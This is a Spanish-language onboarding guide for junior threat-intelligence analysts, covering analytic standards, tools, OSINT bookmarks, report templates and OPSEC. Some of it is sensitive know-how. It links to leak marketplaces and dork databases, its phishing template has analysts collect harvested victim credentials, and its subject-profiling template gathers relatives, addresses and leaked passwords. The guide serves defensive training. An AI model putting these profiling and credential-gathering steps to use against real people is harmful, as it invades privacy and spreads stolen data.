"It is very likely the actor is APT28 with low confidence". Bien: "It is very likely [80-95%] the actor is APT28. Confidence is moderate because attribution rests on infrastructure overlap with two priors, no malware sample matches yet." Profundiza: [[entidad-wep]]. Equivalente UK: [[entidad-phia-yardstick]]. Quién puede leer tu reporte. Va arriba del documento, siempre.Default conservador Si dudas entre AMBER y GREEN, etiqueta AMBER. Bajar el TLP siempre se puede; subirlo después de divulgación es imposible. Profundiza: [[entidad-tlp-v2]]. Mantenido por [[entidad-first-org]]. Directiva del ODNI estadounidense. Aplican a cualquier producto analítico decente, no sólo IC clásica. Describe calidad y credibilidad de fuentes y metodología Expresa incertidumbres con WEP estándar Distingue información objetiva de juicios analíticos Incorpora análisis de alternativas (ACH) Demuestra relevancia para el cliente y sus implicaciones Argumentación clara y lógica Explica cambios o consistencia respecto a juicios previos Produce juicios precisos Información visual efectiva cuando aporta Para el junior Los más importantes para empezar son los 1, 2 y 3. Si tu reporte cumple esos tres, ya estás por encima del 70% de los reportes mediocres del mercado. Profundiza: [[entidad-icd-203]] Mapa lineal de un ciberataque. Lo usas para situar dónde está la actividad observada. Reconnaissance — el adversario investiga al objetivo Weaponization — prepara el payload (exploit + RAT/backdoor) Delivery — entrega el payload (phishing, USB, watering hole) Exploitation — explota la vulnerabilidad Installation — instala persistencia C2 — establece canal de mando y control Actions on Objectives — exfiltra, cifra, destruye Profundiza: [[entidad-cyber-kill-chain]]. Versión extendida 18 fases: [[entidad-unified-kill-chain]]. Complementa CKC. Ves un evento de intrusión como un diamante con cuatro vértices: Adversary ↔ Capability ↔ Infrastructure ↔ Victim. Permite razonar relaciones, no sólo secuencia.Tip Cuando tengas un IOC, intenta ubicarlo en uno de los vértices: una IP es Infrastructure, un implant es Capability, una empresa atacada es Victim, un grupo nombrado es Adversary. Si conectas dos vértices, ya tienes una hipótesis de campaña. Profundiza: [[entidad-diamond-model]] Catálogo público de tácticas (objetivos) y técnicas (cómo se logran). El junior mapea TTPs vistos a IDs ATT&CK (T1059.001, T1486, etc.) para que cualquier otro analista del mundo entienda al instante. Tactics = qué quería el adversario en cada paso (Initial Access, Execution, Persistence, ...) Techniques = cómo lo hizo (PowerShell, Scheduled Task, ...) Sub-techniques = la variante exacta Operacionalízalo con MITRE ATT&CK Navigator — capa JSON visualizable en https://mitre-attack.github.io/attack-navigator/. Te permite pintar el "heatmap" de un actor y compararlo con la cobertura de tus detecciones. Profundiza: [[entidad-mitre-attack]] + [[entidad-mitre-attack-navigator]]. Mantenido por [[entidad-mitre-corporation]]. Trío canónico CTI moderno CKC + Diamond + ATT&CK se usan juntos: CKC dice en qué fase, Diamond dice qué entidades, ATT&CK dice qué técnica concreta. Cualquier reporte sólido los referencia los tres. Tres voces se mezclan en el archivo fuente:Notas previas relevantes: ninguno de los juniors paga IA; uno tiene cuentas en Claude y GPT (gratis) y prevé pasarse a Claude de pago en 1-2 meses. Único prompt almacenado: el de Feedly del cliente TRACCES (incluido en §5).Herramientas que junior-1 declara usar a diario, agrupadas por función operativa. Todas se conservan tal cual; la categorización es ayuda navegacional, no la enviada por él (que era una lista plana). Splunk — SIEM enterprise, búsqueda y correlación Elastic Stack — ELK / Elasticsearch + Kibana + Logstash Microsoft Sentinel — SIEM cloud-native de Azure MISP — Plataforma open source de IOC sharing → [[entidad-misp]] OpenCTI — TIP open source con grafo STIX2 → [[entidad-opencti]] Maltego — Link analysis, transformaciones OSINT TheHive — Gestión de casos / SIRP open source → [[entidad-thehive]] Cortex — Motor de análisis y enrichment para TheHive VirusTotal — Análisis multi-engine de archivos/URLs Shodan — Buscador de dispositivos expuestos GreyNoise — Contexto de ruido de internet (escaneadores benignos vs maliciosos) AbuseIPDB — Reputación de IPs (reportes comunitarios) URLhaus — Feed de URLs maliciosas (abuse.ch) AlienVault OTX — Open Threat Exchange, pulsos comunitarios Censys — Buscador de hosts y certificados expuestos RiskIQ — Surface + threat intelligence (PassiveTotal) Any.Run — Sandbox interactivo en navegador Sigma — Reglas genéricas de detección para SIEM YARA — Pattern matching para clasificación de malware MITRE ATT&CK Navigator — Mapeo y visualización de TTPs → [[entidad-mitre-attack-navigator]] Docker — Contenedores GitHub — Repos, issues, code search Notion o Obsidian — Notas / documentación personal Pendiente: junior-1 mencionó tener un "repo de OSINT bastante tocho" en su otro ordenador. Solicitar y anexar cuando lo comparta. Ver §7. Unión deduplicada de los dos bloques de marcadores enviados por junior-2. Las categorías y nombres son los suyos; sólo se han fusionado URLs duplicadas y consolidado las dos pasadas en un único listado.
https://github.com/jivoi/awesome-osint
https://github.com/Bert-JanP/Open-Source-Threat-Intel-Feeds
https://github.com/phishdestroy/Open-Source-Threat-Intel-Feeds
https://github.com/syphon1c/Threatelligence
https://leakhub.ai/browse
https://manuelbot59.com/osint/
https://whatsmyname.streamlit.app/ osintambition/Social-Media-OSINT-Tools-Collection — colección de tools OSINT para SOCINT (URL pendiente de completar)
https://www.redeszone.net/tutoriales/redes-cable/rango-direcciones-ip-paises/
https://www.criminalip.io/
https://www.talosintelligence.com/reputation_center
https://www.speedguide.net/ports.php
https://iplists.firehol.org/
https://ipleak.net/
https://sunders.uber.space/ — cámaras de vigilancia
https://www.placespotter.com/
https://livingatlas.arcgis.com/wayback/#mapCenter=55.14363%2C25.09182%2C15&mode=explore&active=22252 — wayback de imágenes satelitales (ArcGIS)
https://github.com/BigBodyCobain/Shadowbroker
https://www.wikistrat.com/blog/tags/russia-1
https://www.wikistrat.com/blog/tags/geopolitics-1
https://monitor-the-situation.com/?utm_source=substack&utm_medium=email#/@-41.4844,46.8386,2z
https://monitor-the-situation.com/middle-east
https://www.iranmonitor.org/
https://www.al-monitor.com/ — monitor de actividad y noticias de Oriente Medio
https://www.wartracker24.com/
https://signalcockpit.com/
https://www.worldmonitor.app/
https://leakhub.ai/browse
https://cybermonit.com/leaks
https://leakhub.ai/browse
https://www.hudsonrock.com/threat-intelligence-cybercrime-tools
https://billing.whoisfreaks.com/login
https://otx.alienvault.com/dashboard/new — pulsos, IOCs
https://glint.trade/terminal
https://github.com/syphon1c/Threatelligence
https://github.com/ravenastar-js/social-id?tab=readme-ov-file
https://think-pol.com/tools
https://www.cvedetails.com/
https://nvd.nist.gov/
https://www.paessler.com/monitoring/security/data-breach-monitoring-tool
https://epieos.com/#discover
https://www.exploit-db.com/google-hacking-database
https://taksec.github.io/google-dorks-bug-bounty/
https://intelx.io/dorks
https://www.exploit-db.com/google-hacking-database
https://www.hudsonrock.com/threat-intelligence-cybercrime-tools
https://intelx.io/
https://intelx.io/tools?tab=general
https://chatgpt.com/g/g-Rddxw5Vyc-cavaliergpt-cybersecurity-osint-investigations — CavalierGPT (Cybersecurity & OSINT Investigations)
https://threatview.io/#feeds
https://www.digitalattackmap.com/?utm_source=chatgpt.com#anim=1&color=0&country=ALL&list=0&time=18763&view=map
https://threatmap.bitdefender.com/
https://investigaosint.io/
https://platform.censys.io/home
https://www.track2pulse.com/
https://www.aprendaredes.com/
https://book.hacktricks.wiki/en/index.html
https://ctf.osintnewsletter.com/challenges
https://threatfox.abuse.ch/
https://threatfox.abuse.ch/browse/
https://cuiiliste.de/domains
https://coveryourtracks.eff.org/
https://www.track2pulse.com/
https://github.com/smittix/intercept
https://www.iranmonitor.org/
https://github.com/BigBodyCobain/Shadowbroker
https://github.com/CrisorHacker/vulninventory/tree/main
https://github.com/LadybirdBrowser/ladybird
https://github.com/elm1nst3r/GHOST-osint-crm
https://github.com/h9zdev/WireTapper
https://nexus.powerforensics.es/
https://github.com/PowerForensics/powerforensics
https://otx.alienvault.com
https://socradar.io
https://www.misp-project.org/feeds/
https://threatfox.abuse.ch
https://www.malwarebazaar.org
https://github.com/UCAPEM-ACADEMY/WhatsApp-ForensiCore/releases/tag/v.2.0.0
https://github.com/jasperan/whatsapp-osint
http://geacron.com/home-es/?lang=es — paso del tiempo en mapa
https://www.accountkiller.com/es/corriente — borrar cuentas en desuso
https://experiments.withgoogle.com/collection/chrome — experimentos de Google
https://rasterbator.net/ — para hacer pósters
https://doseofted.com/project/aesthetic/app.htm — fondos aesthetic
https://s4abuse.com/
https://simplex.chat/directory/
Replit — https://replit.com/ — build apps and sites with AI
JDoodle — https://www.jdoodle.com/ — free AI-powered online coding platform
Google Colab — https://colab.research.google.com/ Yokran/BeBrowser — Operational Framework for OSINT & Virtual HUMINT (URL pendiente) kamakauzy/PHINEAS — Profound HUMINT Intelligence Network & Enrichment Automated System (OSINT for pentesters) (URL pendiente) redouanrfr/Caso de inteligencia de amenazas — Inteligencia de amenazas · Infraestructuras Críticas Francesas 2012-2023 — ~40.000 millones € protegidos · Cero Brecha (URL pendiente) jonathan-capers/AI-in-HUMINT — Estudio de viabilidad sobre puntos de integración potenciales para IA dentro de la disciplina HUMINT (URL pendiente) Las 10 estructuras de reporte que junior-2 utiliza en su día a día. Se conservan verbatim (regla de vault: contenido fuente sin paráfrasis). Los nombres y la numeración del original se respetan.Hooks de doctrina aplicables a TODAS las plantillas En cada uno de los 10 templates, siempre añade en cabecera y conclusiones: TLP arriba del documento (§C.3): TLP:AMBER por defecto cuando es para cliente directo Admiralty rating al evaluar cada fuente (§C.1): (B2), (F6), etc., entre paréntesis tras citar WEP en juicios analíticos (§C.2): "It is likely [55-80%] que el actor sea X" MITRE ATT&CK IDs cuando mencionas técnicas: Initial Access via Phishing (T1566.001) CKC fase cuando ubicas actividad: "Indicadores observados en fase Delivery → Exploitation" Confidence (LOW/MODERATE/HIGH) en cada juicio, separada de likelihood Estos seis hooks convierten un reporte de junior aceptable en uno que un senior firma sin tachar. 4.1.1 Estructura (Cabeceras) Nombre o nombres de los dominios encontrados (en caso de localizar una campaña) Resumen ejecutivo Por qué se consideran phishing o de carácter sospechoso (certificados recientes o distintos a los de la web oficial, no apuntan a los DNS del cliente, no verifican los datos que se introducen y solo te permiten avanzar en el proceso para que introduzcas cuanta más información mejor) Dónde se han encontrado (si ha sido a través de RRSS, búsqueda por Censys o Shodan, anuncio, etc.) Qué datos solicitan (NIF, DNI, usuario, contraseña, etc.) Estado (activo, inactivo o para monitorizar) 4.1.2 Adjuntos Evidencias del phishing Evidencias del proceso de registro o login del phishing Si existe algún directorio victims.txt o similar, descargarlo y enviar como CSV/Excel con las credenciales recogidas Escaneo de la web en urlscan.org URL o paths del phishing con los enlaces rotos (ejemplo https:// → hxxps[:]//) 4.1.3 Otros En "acciones requeridas", indicar a quién se puede contactar para echar abajo el dominio (por ejemplo, contactar con el registrante o el hosting que da servicio a esta web por correo o formulario dedicado a este tipo de incidentes) Hooks de doctrina específicos CKC: phishing es fase Delivery (Lockheed CKC paso 3); si recoge credenciales que luego se usan, también Exploitation/C2. ATT&CK: T1566.001 (Spearphishing Attachment) o T1566.002 (Spearphishing Link) o T1566.003 (Service). TLP: AMBER por defecto. RED si la víctima identificable es un VIP del cliente. Playbook IR: ver [[certsg-irm-13-customer-phishing]] (CERT-SG IRM-13). 4.2.1 Estructura (Cabeceras) Resumen ejecutivo Fuente del leak (foro criminal, marketplace, Telegram, paste, stealer logs, etc.) Tipo de información expuesta (usuarios internos, contraseñas, tokens, cookies, OTP) Nivel de riesgo Estado (en venta, publicado gratuitamente, retirado, confirmado) 4.2.2 Adjuntos Archivo(s) comprometido(s) Tipo (CSV, TXT, ZIP, stealer log) Volumen de datos Muestras sanitizadas Hashes asociados 4.2.3 Otros Usuarios internos afectados Servicios impactados (VPN, O365, GitHub, SaaS, etc.) Acciones recomendadas: Reset de credenciales Forzar MFA Monitorización de accesos anómalos Observaciones CTI Hooks de doctrina específicos TLP: AMBER+STRICT mínimo. Si hay credenciales activas → RED. Admiralty del foro/canal: BreachForums anónimos = F4-F6; vendor con reputación histórica = D3-C3; verificación con muestra propia = sube a B2. ATT&CK: técnicas asociadas T1078 (Valid Accounts), T1555 (Credentials from Password Stores). Playbook IR: ver [[certsg-irm-11-information-leakage]]. 4.3.1 Estructura (Cabeceras) Identificación del origen del evento reportado por Flare (endpoint, repositorio, servicio) Validación de la legitimidad del dispositivo o recurso afectado Análisis de metadatos asociados: usuario, timestamp, ubicación, tipo de alerta 4.3.2 Adjuntos Revisión de archivos extraídos por Flare Cálculo de hashes y comparación con fuentes CTI internas y externas Análisis estático y dinámico en sandbox cuando aplica Clasificación del riesgo según comportamiento, payload o exposición de datos 4.3.3 Otros Identificación de TTPs asociados a actores conocidos (MITRE ATT&CK) Revisión de repositorios públicos (GitHub, GitLab, Bitbucket) en busca de fugas Evaluación del impacto potencial (exfiltración, persistencia, credenciales expuestas) Hooks de doctrina específicos TLP: AMBER por defecto. AMBER+STRICT si el endpoint es identificable (laptop ejecutivo, máquina de DBA). Diamond Model: el stealer log conecta los 4 vértices: Adversary (operador del C2) ↔ Capability (familia stealer Redline/Lumma/Stealc) ↔ Infrastructure (panel C2, drop site) ↔ Victim (usuario corporativo). ATT&CK: T1555 Credentials from Password Stores, T1539 Steal Web Session Cookie. 4.4.1 Estructura (Cabeceras) Resumen ejecutivo Por qué está siendo tendencia, qué vulnerabilidades utiliza, si existe PoC Funcionamiento y análisis técnico Si está estrechamente relacionada con threat actors conocidos (if) 4.4.2 Adjuntos IOCs TTPs CVEs utilizados Query de detección, reglas YARA, reglas SIGMA, common paths, common file names u otros identificadores para hacer hunting Fuentes A1 a poder ser (Unit 42, Microsoft Threat Intelligence Team, Mandiant, etc.) 4.4.3 Otros Recomendaciones para la mitigación y prevención del ataque (normalmente ya se incluyen en los sources) Hooks de doctrina específicos — el reporte estrella del L1 Esta plantilla es donde se nota más si has hecho los deberes: Diamond Model COMPLETO: rellena los 4 vértices (Adversary / Capability / Infrastructure / Victim) — [[entidad-diamond-model]] CKC mapping: para CADA TTP, di a qué fase de las 7 pertenece — [[entidad-cyber-kill-chain]] ATT&CK matrix: tabla con Tactic | Technique | Sub-technique | Observed Behavior | Source — [[entidad-mitre-attack]] Confidence calibrada: HIGH si tienes muestra propia + fuente A1; MODERATE si dos B2; LOW si una sola C3 o D3 Playbook IR ransomware: [[certsg-irm-17-ransomware]]. Para malware genérico: [[certsg-irm-07-windows-malware]] o [[certsg-irm-01-worm-infection]]. Plantilla externa "gold": [[entidad-mitre-cti-blueprints]] y [[entidad-zeltser-cti-template]]. 4.5.1 Estructura (Cabeceras) Resumen ejecutivo Por qué están siendo tendencia, qué vulnerabilidades utilizan Ataques recientes o más importantes Funcionamiento, cómo proceden o algún tipo de análisis técnico Qué malware o ransomware utilizan (if) 4.5.2 Adjuntos IOCs TTPs CVEs utilizados Query de detección, reglas YARA, reglas SIGMA, common paths, common file names u otros identificadores para hacer hunting Fuentes A1 a poder ser (Unit 42, Microsoft Threat Intelligence Team, Mandiant, etc.) 4.5.3 Otros Recomendaciones para la mitigación y prevención del ataque (normalmente ya se incluyen en los sources) Hooks de doctrina específicos Atribución como junior: habla de probable atribución con WEP. Mal: "es APT28". Bien: "es likely [55-80%] que la campaña esté asociada a APT28, moderate confidence, basado en infraestructure overlap (B2 Mandiant) y técnica de lateral movement consistente con histórico (C3 propio)". Plantilla TAP standalone: [[entidad-curated-intelligence-threat-actor-profile]]. MITRE ATT&CK Navigator layer JSON: pinta el heatmap del actor para que el cliente vea su exposición. Layer público para muchos actores en attack.mitre.org/groups/. Diamond + ATT&CK + CKC integrados son el trío canónico — [[entidad-mitre-attack]] + [[entidad-diamond-model]] + [[entidad-cyber-kill-chain]]. 4.6.1 Estructura (Cabeceras) CVEs recientes, críticos o en tendencia por explotación o gravedad sobre software incluido en el tech stack del cliente (si existe duda en cuanto a si de verdad lo utilizan, pero tal vez no se encuentra en el tech stack como ej: versión de Python, PHP, etc., reportar indicándolo) Funcionamiento o análisis técnico Indicar si existe un parche al momento que se realizó el reporte 4.6.2 Adjuntos Fuentes Link del parche donde se mitiga (si está disponible) PoC si está disponible en GitHub u otros 4.6.3 Otros Recomendaciones para la mitigación Criticidad: depende de la gravedad del CVE, pero elegir entre LOW, MEDIUM o HIGH Hooks de doctrina específicos CVSS vs criticidad cliente: NO copies el CVSS sin contexto. Una CVE 9.8 que el cliente NO tiene en producción es LOW operativo. Una 7.2 en su gateway expuesto es CRITICAL. Reporta ambos. Exploitation status: cita CISA KEV (https://www.cisa.gov/known-exploited-vulnerabilities-catalog) y EPSS (https://www.first.org/epss/) — son referencias A1 para "explotada in the wild". TLP: GREEN/CLEAR normalmente (CVE pública). AMBER si añades análisis de exposición concreta del cliente. 4.7.1 Estructura (Cabeceras) Resumen ejecutivo del parche CVEs incluidos en el mismo con relación al tech stack del cliente (si existe duda en cuanto a si de verdad lo utilizan, pero tal vez no se encuentra en el tech stack como ej: versión de Python, PHP, etc., reportar indicándolo) Análisis técnico de las más graves 4.7.2 Adjuntos Fuentes Link del parche donde se mitigan PoC si está disponible en GitHub u otros sobre aquellos CVEs que lo tengan 4.7.3 Otros Recomendaciones para la mitigación Criticidad: depende de la gravedad de los CVEs, pero elegir entre LOW, MEDIUM o HIGH Hooks específicos Filtra por tech stack del cliente ANTES de redactar. Saca el inventario y cruza CVE × producto. Recuerda que muchos CVE Apple/Adobe no aplican a clientes B2B. Fuentes A1 mensuales: MSRC (https://msrc.microsoft.com/update-guide/) + Talos blog + Tenable Patch Tuesday + Crowdstrike monthly. 4.8.1 Estructura (Cabeceras) Resumen ejecutivo Cómo ha ocurrido el ataque Threat actor o malware responsable Si en el momento del reporte existe comunicación oficial de la entidad afectada Third party involucrada (si hay) Datos o información extraída en el ataque Estado (en venta, publicado gratuitamente, retirado, confirmado) 4.8.2 Adjuntos Fecha del ataque TTPs utilizados CVEs utilizados Screenshot del post del foro en la DW (si hay) Fuente o comunicación oficial de la entidad afectada IOCs (si hay) 4.8.3 Otros Recomendaciones por parte de la empresa afectada (si es third party y el cliente está relacionado) Criticidad como mínimo HIGH y si es cliente CRITICAL Updates constantes sobre los últimos acontecimientos del incidente (nuevas comunicaciones, nueva info) Hooks específicos Distingue entre comunicación oficial (A1) y filtraciones del foro (D3-F6). Pon Admiralty a cada cita. Third-party risk: si el cliente usa el producto comprometido, levanta un sub-reporte aparte con scope del impacto y SLA del proveedor. Playbook IR: [[certsg-irm-18-large-scale-compromise]]. Nota: el original numera esta sección como 8.1/8.2/8.3 reutilizando el cardinal de Databreach. Se preserva el contenido íntegro y se renumera 4.9.x para coherencia. 4.9.1 Estructura (Cabeceras) Resumen ejecutivo Cómo se ha localizado el dispositivo (Censys, Shodan, etc.) Gaps de seguridad que tiene (DMARC en none, es visible para todo el mundo, portal interno, etc.) Si la versión web contiene CVEs asociados (en caso de WordPress / PrestaShop, Joomla, Nginx, Apache, etc., donde la versión sea pública) IP pública (y nombre de dominio si tiene) En general, cualquier información que haga entender al cliente por qué eso no debería estar así 4.9.2 Adjuntos Screenshots IP y dominio Versión web TTPs posibles 4.9.3 Otros Accesos anómalos Escaneos previos Exploit attempts Servicios expuestos Credenciales por defecto Versiones vulnerables Hooks específicos Reconnaissance en CKC (fase 1). El reporte gana valor si pintas qué TTPs facilitarías al adversario al dejar esto expuesto. No toques el dispositivo: solo observación pasiva (banner grab via Shodan/Censys archivado). Cualquier interacción activa debe pasar por contrato y autorización explícita. DMARC none: técnica T1566 Phishing facilitada por la mala config; menciona el nexo. 4.10.1 Estructura (Cabeceras) Sujeto de la investigación Resumen o profiling en base a lo que se ha encontrado Relaciones con otros sujetos (familiares, esposo/a, etc.) Si hay algún dispositivo infectado relacionado en Flare, también hacer un análisis técnico 4.10.2 Adjuntos Lista de datos personales extraídos (vivienda, DNI, números de teléfono, etc.) Links a webs asociadas Links a perfiles (tanto corporativos como personales) Excel con credenciales extraídas (censurado o con contraseña para descifrar) 4.10.3 Otros Riesgo de ingeniería social o TTPs a los que podría ser vulnerable (en caso de credenciales o dispositivo infectado) Si existe mala política de contraseña, indicar recomendaciones Reporte legalmente sensible TLP siempre RED o AMBER+STRICT. Datos personales = artículo 6 RGPD, base legal interés legítimo del cliente y proporcionalidad. No publiques credenciales en claro ni en adjuntos sin contraseña. Sanitiza/cifra. Sólo data públicamente accesible. Si entras a una cuenta con creds filtradas → te has pasado a CFAA/intrusión informática. NO LO HAGAS. Playbook IR si hay extorsión: [[certsg-irm-08-blackmail]]. Info Seis procedures que vas a ejecutar 80% de tu primer mes. Cada uno tiene inputs, pasos y outputs concretos. Input: alerta del SIEM (Splunk/Elastic/Sentinel) en cola del L1.Pasos: Lee la regla que disparó la alerta (no actúes sin entender qué buscaba). Recoge los IOCs extraídos: IP source/destination, hash, user, hostname, proceso, command line. Enriquece en paralelo: abre VirusTotal, GreyNoise, AbuseIPDB, OTX, Shodan en pestañas distintas. Pega el IOC en cada una. Aplica Admiralty a cada hit: VT con 30+ vendors detect = A1; GreyNoise "benign" = A1 a favor del falso positivo; OTX pulse de un usuario aleatorio = D3. Decide en una de tres: falso positivo (cierra con justificación), verdadero positivo bajo (escala a L2), verdadero positivo alto (escala con urgencia + sugerencia de contención). Documenta en el ticket: regla, IOCs, fuentes consultadas con Admiralty, decisión, WEP del juicio, próximo paso. Output: ticket cerrado o escalado, con trazabilidad completa.Input: un IOC suelto (típicamente desde un reporte de cliente o un feed).Pasos por tipo:Output: ficha de enrichment con todos los datos cruzados, Admiralty por fuente, y veredicto (malicioso / sospechoso / benigno) con WEP.Input: nombre de un grupo (APT41, FIN7, ScatteredSpider, LockBit, etc.).Pasos: MITRE ATT&CK groups page: https://attack.mitre.org/groups/<G####>/ — lista canónica de TTPs, descarga JSON layer. Vendor reports (A1): busca el último report de Mandiant, Microsoft Threat Intel, Crowdstrike, Unit 42, Recorded Future del actor. MITRE Navigator: pinta el layer JSON sobre la matrix; compara con cobertura del cliente. MalwareBazaar / ThreatFox: muestras y IOCs vinculados al actor. TweetDeck/X de threat hunters (B2-C3): @cyb3rops, @malware_traffic, @vxunderground, @cyberknow, etc. Foros DW / Telegram channels (D3-F6): solo si hay contexto financiero y autorización. Output: perfil del actor estructurado por la plantilla §4.5, con TTPs mapeados a ATT&CK y links a fuentes con Admiralty.Input: investigación cerrada (cualquiera de las 10 categorías §4).Pasos: Elige la plantilla §4.x correspondiente. Rellena CABECERA con TLP, fecha, autor, versión. Resumen ejecutivo (5-7 líneas máximo) con: qué pasó, a quién afecta, criticidad, qué hay que hacer YA. Lo lee el CISO. Cuerpo técnico con TTPs/IOCs/CVEs/Diamond/CKC/ATT&CK según aplique. Fuentes con Admiralty obligatorio. Si una fuente es D3-F6, dilo. Conclusiones con WEP + Confidence separados. Recomendaciones accionables y priorizadas. Auto-revisión con ICD-203 (§C.4): ¿cumplo los 9? Si no, arregla antes de mandar. Revisión por par o senior SIEMPRE en los primeros 90 días. Es lo que paga el sueldo del L2/L3. Output: PDF/MD/DOCX según el cliente, etiquetado, firmado, registrado en TheHive/OpenCTI.Plantillas externas que te ahorran tiempo [[entidad-mitre-cti-blueprints]] (gold standard, 4 DOCX) [[entidad-zeltser-cti-template]] (single-page más citado) [[entidad-kraven-security-cti-template]] (Admiralty + WEP + Diamond + Kill Chain integrados) [[entidad-bushidouk-rfi-template]] (especialmente diseñado para junior analysts, te obliga a mapear ATT&CK + Diamond + CKC y separar EVIDENCIADO/INFERIDO/GAP) Input: una nueva campaña reportada (por ej. nuevo loader detectado por Microsoft Threat Intel).Pasos: Lee el report A1 y extrae: IOCs (hash/IP/dominio), TTPs (ATT&CK IDs), reglas detección si las publican. Sigma: si el report incluye reglas Sigma, conviértelas a tu SIEM (Splunk SPL/ELK KQL/Sentinel KQL). Si no, escribe tus reglas a partir del comportamiento descrito. YARA: si publican reglas YARA, ejecútalas contra tu corpus de muestras (MalwareBazaar histórico + tus colecciones internas). Hunt window: ejecuta la query Sigma sobre los últimos 30-90 días. Mira si ya estabas comprometido y no lo viste. Documenta los hallazgos como pivote de hunting y los falsos positivos como exclusiones de la regla. Output: reglas Sigma/YARA persistidas en repo del SOC, hunt logbook con resultados, recomendación de regla en producción.Input: vigilancia continua del cliente y de su sector.Pasos: Plataformas (de mayor a menor cost): Flare, Hudson Rock, IntelX, SOCRadar, Cybermonit, leakhub.ai, Telegram channels, BreachForums (con cuenta segregada). Vigilancia diaria: keywords (dominios, marcas, ejecutivos, nombres internos, productos). Stealer logs: cruza emails corporativos del cliente contra dumps recientes. Si hit → reporte §4.2 inmediato. Foros: monitoriza posts de venta/leak relacionados con el sector del cliente. Aplica Admiralty al vendor. OPSEC obligatorio (§F): nunca uses tu cuenta personal para acceder a estos sitios. Browser perfilado, VPN, sandbox. Output: alertas accionables en la cola del L1 con triaje §D.1 inmediato si tocan al cliente directo.Info Cuando dices "según fuente A1" en un reporte, esperas que el lector senior reconozca el nombre. Aquí los 8 que un L1 debe conocer y consultar antes que cualquier otro. Otros que aparecen frecuente y son sólidos (B1-A1 según pieza): Sophos Labs (ransomware, MDR data) SentinelOne (S1 Labs) (malware analysis ágil) Trend Micro Research (IoT, ICS, OT threats) Symantec/Broadcom Threat Hunter Team (telemetría histórica enorme) Group-IB (Eastern Europe/Asia, fraude financiero) Bitdefender Labs (mass-malware + IoT) Check Point Research (phishing, mobile) Trellix Advanced Research Center (APT, ICS) Securelist (Kaspersky) y AhnLab ASEC (Asia) Sobre atribución Incluso fuentes A1 fallan en atribución. Cita atribuciones de A1 con WEP likely [55-80%] y MODERATE confidence salvo que tengas convergencia de 3+ vendors A1 → entonces puedes subir a very likely [80-95%] con HIGH confidence. Nunca como junior pongas almost certainly [95-99%] en una atribución. Feeds gratuitos sólidos (no A1 pero útiles a diario): abuse.ch (URLhaus, MalwareBazaar, ThreatFox, Feodo Tracker) — B2-A2 AlienVault OTX (pulses) — variable C3-B2 según autor CISA KEV catalog — A1 para "explotada in the wild" EPSS (FIRST.org) — A1 para probabilidad de explotación NVD (NIST) — A1 para CVE oficial Sigma HQ + YARA-Rules repos — B2-A2 (muchos contribuidores reputados) @malware_traffic_analysis (Brad Duncan) — B1 @vxunderground — B2 (archivos de muestras + leaks de operadores) Warning Si haces CTI mal en OPSEC, te conviertes en objetivo. Estos 7 puntos son los no negociables del primer día. Para profundizar: LISAInstitute_MPAI-A4-M4. Compartimentación: cuenta corporativa nunca toca cuenta personal. Nunca. Ni para "una cosa rápida". Browser dedicado para investigación: Tor Browser para .onion, Brave/Firefox endurecido para foros clearnet, Burner profile en VPN para webs sospechosas. Usa container tabs (Firefox Multi-Account Containers). VPN siempre activa durante recon en sitios sospechosos. Si estás en clearnet de proxy del SOC, asegúrate que tu organización lo permite (algunas requieren ir SIN VPN para auditoría). Sandbox para muestras: NUNCA detones malware en tu host físico. Any.Run en navegador para casos rápidos; VM/Cuckoo/REMnux aislada para análisis profundo. Snapshots antes y después. 2FA obligatorio en TODOS los servicios profesionales (VirusTotal Enterprise, OpenCTI, MISP, etc.). Hardware key (YubiKey) ideal; TOTP en Aegis/Authy/2FAS aceptable. SMS NO. Tu huella digital: Egosurfing trimestral. Google Alerts con tu nombre + organización. Si tu LinkedIn dice "CTI Analyst at XYZ", eres objetivo del social engineering. Usa OpSec en redes (no checkpoints, no fotos del despacho con pantallas, no horarios). "Need to disclose" sobre "need to know": aplicado al hardware, si no puedes securizar al 100% el dispositivo, mejor no lo tengas. Móvil con WhatsApp = potencial leak. Cubre cámaras, desactiva micros cuando no se usan. Bonus para CTH específicamente: Burner identity sólo si tu organización lo autoriza por escrito y la usas en una infra dedicada (no tu portátil de trabajo, no tu casa). Identidades sin OpSec se queman en 2 semanas. Acceso a foros DW: nunca pagues cuotas con tu tarjeta personal. Cripto desde wallet aislado y atribuible al pago de la operación. Pivots OSINT: cuando buscas un dominio sospechoso, ¡no lo visites directamente! urlscan.io / VT pasivo / Wayback Machine primero. Sólo activo si tienes contención. Info Tu cerebro miente todos los días. Estos 6 sesgos son los más letales para un junior CTI. Profundiza en LISAInstitute_MPAI-A5-M1 y [[sesgos-cognitivos-analista]]. Ritual diario anti-sesgo Antes de mandar un reporte, pregúntate: "¿Qué tendría que ser cierto para que mi conclusión esté equivocada? ¿He buscado esa evidencia con la misma intensidad que la confirmatoria?" Si la respuesta es "no", retrasa 30 minutos y re-analiza. Esto es la base de Devil's Advocacy — [[entidad-devils-advocacy]]. Warning Diez antipatterns que verás en tu primer trimestre. Si sólo recuerdas tres, recuerda los marcados con (★). (★) Paráfrasis del source en lugar de cita verbatim → pérdida de trazabilidad, riesgo de alteración de sentido. Antídoto: cita verbatim entrecomillado + tu interpretación aparte. (★) "Es seguro que..." → muerte de la calibración, te quemas la primera vez que falla. Antídoto: WEP siempre. Sustituye "seguro" por "very likely [80-95%], high confidence" y razónalo. (★) Atribuir actor sin Admiralty + 3 pilares → reporte ridículo si te equivocas. Antídoto: WEP + 3 pilares (TTPs + Infrastructure + Victimología) o no atribuyas. No poner TLP → tu reporte se reenvía sin control. Antídoto: TLP arriba SIEMPRE, default AMBER. Mezclar likelihood y confidence en una frase → confunde al lector. Antídoto: dos frases separadas. Citar VT score "30/70" sin contextualizar → 30 detections puede significar tinder o false positive en familia conocida. Antídoto: cita los nombres detectados, no sólo el ratio. No mapear TTPs a ATT&CK → reporte ininteligible para el SOC del cliente. Antídoto: cada técnica → ID ATT&CK obligatorio. Olvidar el tech stack del cliente en CVE/Patch reports → ruido inservible. Antídoto: cruza CVE × inventario ANTES de escribir. Detonar muestra en host físico → te enseñé esto en §F.4 y aún así lo veo todas las semanas. Antídoto: Any.Run / VM. Sandbox SIEMPRE. Mandar reporte sin que un par/senior lo revise primer trimestre → te firmas tus errores. Antídoto: peer review obligado los primeros 90 días, sin excepciones. Pareto Los errores 1, 2 y 3 (★) son ~70% de las correcciones que un L2 hace a un L1. Domínalos pronto y subes en visibilidad. Tip Plan progresivo. Si te sientes ahogado en la semana 1, no pasa nada — el primer mes es turbulento por diseño. Si en el día 60 aún no entiendes ATT&CK, pide refuerzo: no es vergüenza, es eficiencia. Lee §B 